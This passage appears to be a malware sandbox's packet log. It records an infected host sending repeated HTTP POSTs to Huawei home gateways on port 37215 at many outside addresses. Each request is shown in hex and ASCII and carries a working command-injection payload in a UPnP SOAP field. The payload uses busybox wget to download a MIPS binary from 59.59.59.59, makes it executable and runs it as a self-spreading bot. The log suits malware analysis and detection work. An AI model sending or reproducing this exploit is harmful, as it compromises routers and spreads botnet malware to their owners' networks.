                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          156192.168.2.155315441.251.114.11337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.543279886 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          157192.168.2.1537988143.243.241.10537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.543315887 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          158192.168.2.1547640157.123.213.12937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.543334007 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          159192.168.2.1553704179.45.46.3837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.543371916 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          160192.168.2.1541990157.208.164.4437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.543374062 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          161192.168.2.154513041.103.229.14837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.543391943 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          162192.168.2.1555460197.76.2.21437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.543412924 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          163192.168.2.155588841.117.251.20537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.543436050 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          164192.168.2.1536414197.168.225.24537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.543749094 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          165192.168.2.1538998157.156.65.19337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.543773890 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 